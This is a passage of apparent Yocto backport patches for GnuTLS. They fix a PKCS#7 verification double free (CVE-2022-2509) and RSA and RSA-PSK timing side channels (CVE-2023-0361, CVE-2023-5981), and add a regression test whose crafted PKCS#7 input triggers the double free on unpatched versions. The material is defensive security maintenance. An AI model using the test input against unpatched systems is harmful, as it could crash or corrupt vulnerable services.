26+ Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
27+ [CVE-2022-2509]
28+
29 ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
30 The TLS server would not bind the session ticket encryption key with a
31 value supplied by the application until the initial key rotation, allowing
32diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
33index 98669e8..ccbc69d 100644
34--- a/lib/x509/pkcs7.c
35+++ b/lib/x509/pkcs7.c
36@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
37 issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
38
39 if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
40- if (prev) gnutls_x509_crt_deinit(prev);
41+ if (prev && prev != signer)
42+ gnutls_x509_crt_deinit(prev);
43 prev = issuer;
44 break;
45 }
46diff --git a/tests/Makefile.am b/tests/Makefile.am
47index 11a083c..cd43a0f 100644
48--- a/tests/Makefile.am
49+++ b/tests/Makefile.am
50@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
51 tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
52 sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
53 tls13-without-timeout-func buffer status-request-revoked \
54- set_x509_ocsp_multi_cli kdf-api keylog-func \
55+ set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
56 dtls_hello_random_value tls_hello_random_value x509cert-dntypes
57
58 if HAVE_SECCOMP_TESTS
59diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
60new file mode 100644
61index 0000000..fadf307
62--- /dev/null
63+++ b/tests/pkcs7-verify-double-free.c
64@@ -0,0 +1,215 @@
65+/*
66+ * Copyright (C) 2022 Red Hat, Inc.
67+ *
68+ * Author: Zoltan Fridrich
69+ *
70+ * This file is part of GnuTLS.
71+ *
72+ * GnuTLS is free software: you can redistribute it and/or modify it
73+ * under the terms of the GNU General Public License as published by
74+ * the Free Software Foundation, either version 3 of the License, or
75+ * (at your option) any later version.
76+ *
77+ * GnuTLS is distributed in the hope that it will be useful, but
78+ * WITHOUT ANY WARRANTY; without even the implied warranty of
79+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
80+ * General Public License for more details.
81+ *
82+ * You should have received a copy of the GNU General Public License
83+ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
84+ */
85+
86+#ifdef HAVE_CONFIG_H
87+#include <config.h>
88+#endif
89+
90+#include <stdio.h>
91+#include <gnutls/pkcs7.h>
92+#include <gnutls/x509.h>
93+
94+#include "utils.h"
95+
96+static char rca_pem[] =
97+ "-----BEGIN CERTIFICATE-----\n"
98+ "MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
99+ "cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
100+ "VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
101+ "v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
102+ "v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
103+ "ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
104+ "t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
105+ "/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
106+ "5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
107+ "DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
108+ "BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
109+ "i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
110+ "l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
111+ "jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
112+ "FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
113+ "MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
114+ "LirBWjg89RoAjFQ7bTE=\n"
115+ "-----END CERTIFICATE-----\n";
116+
117+static char ca_pem[] =
118+ "-----BEGIN CERTIFICATE-----\n"
119+ "MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
120+ "cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
121+ "VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
122+ "ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
123+ "ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
124+ "4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
125+ "RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
126+ "obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
127+ "bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
128+ "BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
129+ "o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
130+ "DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
131+ "W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
132+ "lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
133+ "248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
134+ "+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
135+ "NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
136+ "-----END CERTIFICATE-----\n";
137+
138+static char ee_pem[] =
139+ "-----BEGIN CERTIFICATE-----\n"
140+ "MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
141+ "cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
142+ "NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
143+ "ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
144+ "eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
145+ "QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
146+ "g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
147+ "Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
148+ "68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
149+ "AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
150+ "kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
151+ "VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
152+ "Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
153+ "dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
154+ "PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
155+ "l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
156+ "G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
157+ "-----END CERTIFICATE-----\n";
158+
159+static char msg_pem[] =
160+ "-----BEGIN PKCS7-----\n"
161+ "MIIK2QYJKoZIhvcNAQcCoIIKyjCCCsYCAQExDTALBglghkgBZQMEAgEwCwYJKoZI\n"
162+ "hvcNAQcBoIIJTzCCAwowggHyoAMCAQICAQEwDQYJKoZIhvcNAQELBQAwFTETMBEG\n"
163+ "A1UECgwKRXhhbXBsZSBDQTAgFw0xNzA3MjExNDQzMjFaGA8yMjIyMDcyMTE0NDMy\n"
164+ "MVowFTETMBEGA1UECgwKRXhhbXBsZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEP\n"
165+ "ADCCAQoCggEBAL51eyE4j8wAKQKMGlO9HEY2iaGvsdPSJmidSdmCi1jnNK39Lx4Y\n"
166+ "31h279hSHF5wtI6VM91HHfeLf1mjEZHlKrXXJQzBPLpbHWapD778drHBitOP8e56\n"
167+ "fDMIfofLV4tkMk8690vPe4cJH1UHGspMyz6EQF9kPRaW80XtMV/6dalgL/9Esmaw\n"
168+ "XBNPJAS1VutDuXQkJ/3/rWFLmkpYHHtGPjX782YRmT1s+VOVTsLqmKx0TEL8A381\n"
169+ "bbElHPUAMjPcyWR5qqA8KWnS5Dwqk3LwI0AvuhQytCq0S7Xl4DXauvxwTRXv0UU7\n"
170+ "W8r3MLAw9DnlnJiD/RFjw5rbGO3wMePk/qUCAwEAAaNjMGEwDwYDVR0TAQH/BAUw\n"
171+ "AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFIh2KRoKJoe2VtpOwWMkRAkR\n"
172+ "mLWKMB8GA1UdIwQYMBaAFIh2KRoKJoe2VtpOwWMkRAkRmLWKMA0GCSqGSIb3DQEB\n"
173+ "CwUAA4IBAQBovvlOjoy0MCT5U0eWfcPQQjY4Ssrn3IiPNlVkqSNo+FHX+2baTLVQ\n"
174+ "5QTHxwXwzdIJiwtjFWDdGEQXqmuIvnFG+u/whGbeg6oQygfnQ5Y+q6epOxCsPgLQ\n"
175+ "mKKEaF7mvh8DauUx4QSbYCNGCctOZuB1vlN9bJ3/5QbH+2pFPOfCr5CAyPDwHo6S\n"
176+ "qO3yPcutRwT9xS7gXEHM9HhLp+DmdCGh4eVBPiFilyZm1d92lWxU8oxoSfXgzDT/\n"
177+ "GCzlMykNZNs4JD9QmiRClP/3U0dQbOhah/Fda+N+L90xaqEgGcvwKKZa3pzo59pl\n"
178+ "BbkcIP4YPyHeinwkgAn5UVJg9DOxNCS0MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG\n"
179+ "9w0BAQsFADAVMRMwEQYDVQQKDApFeGFtcGxlIENBMCAXDTE3MDcyMTE0NDQxM1oY\n"
180+ "DzIyMjIwNzIxMTQ0NDEzWjAiMSAwHgYDVQQKDBdFeGFtcGxlIGludGVybWVkaWF0\n"
181+ "ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMPFDEvDANwvhviu\n"
182+ "pwXTvaKyxyX94jVu1wgAhIRyQBVRiMbrn8MEufLG8oA0vKd8s92gv/lWe1jFb2rn\n"
183+ "91jMkZWsjWjiJFD6SzqFfBo+XxOGikEqO1MAf92UqavmSGlXVRG1Vy7T7dWibZP0\n"
184+ "WODhHYWayR0Y6owSz5IqNfrHXzDME+lSJxHgRFI7pK+b0OgiVmvyXDKFPvyU6GrP\n"
185+ "lxXDi/XbjyPvC5gpiwtTgm+s8KERwmdlfZUNjkh2PpHx1g1joijHT3wIvO/Pek1E\n"
186+ "C+Xs6w3XxGgL6TTL7FDuv4AjZVX9KK66/yBhX3aN8bkqAg+hs9XNk3zzWC0XEFOS\n"
187+ "Qoh2va0CAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYw\n"
188+ "HQYDVR0OBBYEFHwi/7dUWGjkMWJctOm7MCjjQj1cMB8GA1UdIwQYMBaAFIh2KRoK\n"
189+ "Joe2VtpOwWMkRAkRmLWKMA0GCSqGSIb3DQEBCwUAA4IBAQCF6sHCBdYRwBwvfCve\n"
190+ "og9cPnmPqZrG4AtmSvtoSsMvgvKb/4z3/gG8oPtTBkeRcAHoMoEp/oA+B2ylwIAc\n"
191+ "S5U7jx+lYH/Pqih0X/OcOLbaMv8uzGSGQxk+L9LuuIT6E/THfRRIPEvkDkzC+/uk\n"
192+ "7vUbG17bSEWeF0o/6sjzAY2aH1jnbCDyu0UC78GXkc6bZ5QlH98uLMDMrOmqcZjS\n"
193+ "JFfvuRDQyKV5yBdBkYaobsIWSQDsgYxJzf/2y8c3r+HXqT+jhrXPWJ3btgMPxpu7\n"
194+ "E8KmoFgp9EM+48oYlXJ66rk08/KjaVmgN7R+Hm3e2+MFT2kme4fBKalLjcazTe3x\n"
195+ "0FisMIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdF\n"
196+ "eGFtcGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzBaGA8yMjIyMDcy\n"
197+ "MTE0NDUzMVowFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEB\n"
198+ "BQADggEPADCCAQoCggEBAMjhSqhdD5RjmOm6W3hG7zkgKBP9whRN/SipcdEMlkgc\n"
199+ "F/U3QMu66qIfKwheNdWalC1JLtruLDWP92ysa6Vw+CCG8aSax1AgB//RKQB7kgPA\n"
200+ "9js9hi/oCdBmCv2HJxhWSLz+MVoxgzW4C7S9FenI+btxe/99Uw4nOw7kwjsYDLKr\n"
201+ "tMw8myv7aCW/63CuBYGtohiZupM3RI3kKFcZots+KRPLlZpjv+I2h9xSln8VxKNb\n"
202+ "XiMrYwGfHB7iX7ghe1TvFjKatEUhsqa7AvIq7nfe/cyq97f0ODQO814njgZtk5iQ\n"
203+ "JVavXHdhTVaypt1HdAFMuHX5UATylHxx9tRCgSIijUsCAwEAAaNuMGwwCwYDVR0P\n"
204+ "BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQU\n"
205+ "31+vHl4E/2Jpnwinbzf+d7usshcwHwYDVR0jBBgwFoAUfCL/t1RYaOQxYly06bsw\n"
206+ "KONCPVwwDQYJKoZIhvcNAQELBQADggEBAAWe63DcNwmleQ3INFGDJZ/m2I/R/cBa\n"
207+ "nnrxgR5Ey1ljHdA/x1z1JLTGmGVwqGExs5DNG9Q//Pmc9pZ1yPa8J4Xf8AvFcmkY\n"
208+ "mWoH1HvW0xu/RF1UN5SAoD2PRQ+Vq4OSPD58IlEu/u4o1wZV7Wl91Cv6VNpiAb63\n"
209+ "j9PA1YacOpOtcRqG59Vuj9HFm9f30ejHVo2+KJcpo290cR3Zg4fOm8mtjeMdt/QS\n"
210+ "Atq+RqPAQ7yxqvEEv8zPIZj2kAOQm3mh/yYqBrR68lQUD/dBTP7ApIZkhUK3XK6U\n"
211+ "nf9JvoF6Fn2+Cnqb//FLBgHSnoeqeQNwDLUXTsD02iYxHzJrhokSY4YxggFQMIIB\n"
212+ "TAIBATAnMCIxIDAeBgNVBAoMF0V4YW1wbGUgaW50ZXJtZWRpYXRlIENBAgEBMAsG\n"
213+ "CWCGSAFlAwQCATANBgkqhkiG9w0BAQEFAASCAQATHg6wNsBcs/Ub1GQfKwTpKCk5\n"
214+ "8QXuNnZ0u7b6mKgrSY2Gf47fpL2aRgaR+BAQncbctu5EH/IL38pWjaGtOhFAj/5q\n"
215+ "7luVQW11kuyJN3Bd/dtLqawWOwMmAIEigw6X50l5ZHnEVzFfxt+RKTNhk4XWVtbi\n"
216+ "2iIlITOplW0rnvxYAwCxKL9ocaB7etK8au7ixMxbFp75Ts4iLX8dhlAFdCuFCk8k\n"
217+ "B8mi9HHuwr3QYRqMPW61hu1wBL3yB8eoZNOwPXb0gkIh6ZvgptxgQzm/cc+Iw9fP\n"
218+ "QkR0fTM7ElJ5QZmSV98AUbZDHmDvpmcjcUxfSPMc3IoT8T300usRu7QHqKJi\n"
219+ "-----END PKCS7-----\n";
220+
221+const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
222+const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
223+const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
224+const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
225+
226+static void tls_log_func(int level, const char *str)
227+{
228+ fprintf(stderr, "%s |<%d>| %s", "err", level, str);
229+}
230+
231+#define CHECK(X)\
232+{\
233+ r = X;\
234+ if (r < 0)\
235+ fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
236+}\
237+
238+void doit(void)
239+{
240+ int r;
241+ gnutls_x509_crt_t rca_cert = NULL;
242+ gnutls_x509_crt_t ca_cert = NULL;
243+ gnutls_x509_crt_t ee_cert = NULL;
244+ gnutls_x509_trust_list_t tlist = NULL;
245+ gnutls_pkcs7_t pkcs7 = NULL;
246+ gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
247+
248+ if (debug) {
249+ gnutls_global_set_log_function(tls_log_func);
250+ gnutls_global_set_log_level(4711);
251+ }
252+
253+ // Import certificates
254+ CHECK(gnutls_x509_crt_init(&rca_cert));
255+ CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
256+ CHECK(gnutls_x509_crt_init(&ca_cert));
257+ CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
258+ CHECK(gnutls_x509_crt_init(&ee_cert));
259+ CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
260+
261+ // Setup trust store
262+ CHECK(gnutls_x509_trust_list_init(&tlist, 0));
263+ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
264+ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
265+ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
266+
267+ // Setup pkcs7 structure
268+ CHECK(gnutls_pkcs7_init(&pkcs7));
269+ CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
270+
271+ // Signature verification
272+ gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
273+
274+ gnutls_x509_crt_deinit(rca_cert);
275+ gnutls_x509_crt_deinit(ca_cert);
276+ gnutls_x509_crt_deinit(ee_cert);
277+ gnutls_x509_trust_list_deinit(tlist, 0);
278+ gnutls_pkcs7_deinit(pkcs7);
279+}
280--
2812.25.1
282
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
1From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
2From: Alexander Sosedkin <asosedkin@redhat.com>
3Date: Tue, 9 Aug 2022 16:05:53 +0200
4Subject: [PATCH] auth/rsa: side-step potential side-channel
5
6Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
7Signed-off-by: Hubert Kario <hkario@redhat.com>
8Tested-by: Hubert Kario <hkario@redhat.com>
9Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
10 https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
11CVE: CVE-2023-0361
12Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
13---
14 lib/auth/rsa.c | 30 +++---------------------------
15 1 file changed, 3 insertions(+), 27 deletions(-)
16
17diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
18index 8108ee8..858701f 100644
19--- a/lib/auth/rsa.c
20+++ b/lib/auth/rsa.c
21@@ -155,13 +155,10 @@ static int
22 proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
23 size_t _data_size)
24 {
25- const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
26 gnutls_datum_t ciphertext;
27 int ret, dsize;
28 ssize_t data_size = _data_size;
29 volatile uint8_t ver_maj, ver_min;
30- volatile uint8_t check_ver_min;
31- volatile uint32_t ok;
32
33 #ifdef ENABLE_SSL3
34 if (get_num_version(session) == GNUTLS_SSL3) {
35@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
36
37 ver_maj = _gnutls_get_adv_version_major(session);
38 ver_min = _gnutls_get_adv_version_minor(session);
39- check_ver_min = (session->internals.allow_wrong_pms == 0);
40
41 session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
42 if (session->key.key.data == NULL) {
43@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
44 return ret;
45 }
46
47- ret =
48- gnutls_privkey_decrypt_data2(session->internals.selected_key,
49- 0, &ciphertext, session->key.key.data,
50- session->key.key.size);
51+ gnutls_privkey_decrypt_data2(session->internals.selected_key,
52+ 0, &ciphertext, session->key.key.data,
53+ session->key.key.size);
54 /* After this point, any conditional on failure that cause differences
55 * in execution may create a timing or cache access pattern side
56 * channel that can be used as an oracle, so treat very carefully */
57@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
58 * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
59 */
60
61- /* ok is 0 in case of error and 1 in case of success. */
62-
63- /* if ret < 0 */
64- ok = CONSTCHECK_EQUAL(ret, 0);
65- /* session->key.key.data[0] must equal ver_maj */
66- ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
67- /* if check_ver_min then session->key.key.data[1] must equal ver_min */
68- ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
69- CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
70-
71- if (ok) {
72- /* call logging function unconditionally so all branches are
73- * indistinguishable for timing and cache access when debug
74- * logging is disabled */
75- _gnutls_no_log("%s", attack_error);
76- } else {
77- _gnutls_debug_log("%s", attack_error);
78- }
79-
80 /* This is here to avoid the version check attack
81 * discussed above.
82 */
83--
842.25.1
85
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
1Backport of:
2
3From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
4From: Daiki Ueno <ueno@gnu.org>
5Date: Mon, 23 Oct 2023 09:26:57 +0900
6Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
7
8This removes branching that depends on secret data, porting changes
9for regular RSA key exchange from
104804febddc2ed958e5ae774de2a8f85edeeff538 and
1180a6ce8ddb02477cd724cd5b2944791aaddb702a. This also removes the
12allow_wrong_pms as it was used sorely to control debug output
13depending on the branching.
14
15Signed-off-by: Daiki Ueno <ueno@gnu.org>
16
17Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
18Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
19CVE: CVE-2023-5981
20Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
21---
22 lib/auth/rsa.c | 2 +-
23 lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
24 lib/gnutls_int.h | 4 ---
25 lib/priority.c | 1 -
26 4 files changed, 35 insertions(+), 62 deletions(-)
27
28--- a/lib/auth/rsa.c
29+++ b/lib/auth/rsa.c
30@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
31 session->key.key.size);
32 /* After this point, any conditional on failure that cause differences
33 * in execution may create a timing or cache access pattern side
34- * channel that can be used as an oracle, so treat very carefully */
35+ * channel that can be used as an oracle, so tread carefully */
36
37 /* Error handling logic:
38 * In case decryption fails then don't inform the peer. Just use the
39--- a/lib/auth/rsa_psk.c
40+++ b/lib/auth/rsa_psk.c
41@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
42 {
43 gnutls_datum_t username;
44 psk_auth_info_t info;
45- gnutls_datum_t plaintext;
46 gnutls_datum_t ciphertext;
47 gnutls_datum_t pwd_psk = { NULL, 0 };
48 int ret, dsize;
49- int randomize_key = 0;
50 ssize_t data_size = _data_size;
51 gnutls_psk_server_credentials_t cred;
52 gnutls_datum_t premaster_secret = { NULL, 0 };
53+ volatile uint8_t ver_maj, ver_min;
54
55 cred = (gnutls_psk_server_credentials_t)
56 _gnutls_get_cred(session, GNUTLS_CRD_PSK);
57@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
58 }
59 ciphertext.size = dsize;
60
61- ret =
62- gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
63- &ciphertext, &plaintext);
64- if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
65- /* In case decryption fails then don't inform
66- * the peer. Just use a random key. (in order to avoid
67- * attack against pkcs-1 formatting).
68- */
69- gnutls_assert();
70- _gnutls_debug_log
71- ("auth_rsa_psk: Possible PKCS #1 format attack\n");
72- if (ret >= 0) {
73- gnutls_free(plaintext.data);
74- }
75- randomize_key = 1;
76- } else {
77- /* If the secret was properly formatted, then
78- * check the version number.
79- */
80- if (_gnutls_get_adv_version_major(session) !=
81- plaintext.data[0]
82- || (session->internals.allow_wrong_pms == 0
83- && _gnutls_get_adv_version_minor(session) !=
84- plaintext.data[1])) {
85- /* No error is returned here, if the version number check
86- * fails. We proceed normally.
87- * That is to defend against the attack described in the paper
88- * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
89- * Ondej Pokorny and Tomas Rosa.
90- */
91- gnutls_assert();
92- _gnutls_debug_log
93- ("auth_rsa: Possible PKCS #1 version check format attack\n");
94- }
95- }
96+ ver_maj = _gnutls_get_adv_version_major(session);
97+ ver_min = _gnutls_get_adv_version_minor(session);
98
99+ premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
100+ if (premaster_secret.data == NULL) {
101+ gnutls_assert();
102+ return GNUTLS_E_MEMORY_ERROR;
103+ }
104+ premaster_secret.size = GNUTLS_MASTER_SIZE;
105
106- if (randomize_key != 0) {
107- premaster_secret.size = GNUTLS_MASTER_SIZE;
108- premaster_secret.data =
109- gnutls_malloc(premaster_secret.size);
110- if (premaster_secret.data == NULL) {
111- gnutls_assert();
112- return GNUTLS_E_MEMORY_ERROR;
113- }
114-
115- /* we do not need strong random numbers here.
116- */
117- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
118- premaster_secret.size);
119- if (ret < 0) {
120- gnutls_assert();
121- goto cleanup;
122- }
123- } else {
124- premaster_secret.data = plaintext.data;
125- premaster_secret.size = plaintext.size;
126+ /* Fallback value when decryption fails. Needs to be unpredictable. */
127+ ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
128+ premaster_secret.size);
129+ if (ret < 0) {
130+ gnutls_assert();
131+ goto cleanup;
132 }
133
134+ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
135+ &ciphertext, premaster_secret.data,
136+ premaster_secret.size);
137+ /* After this point, any conditional on failure that cause differences
138+ * in execution may create a timing or cache access pattern side
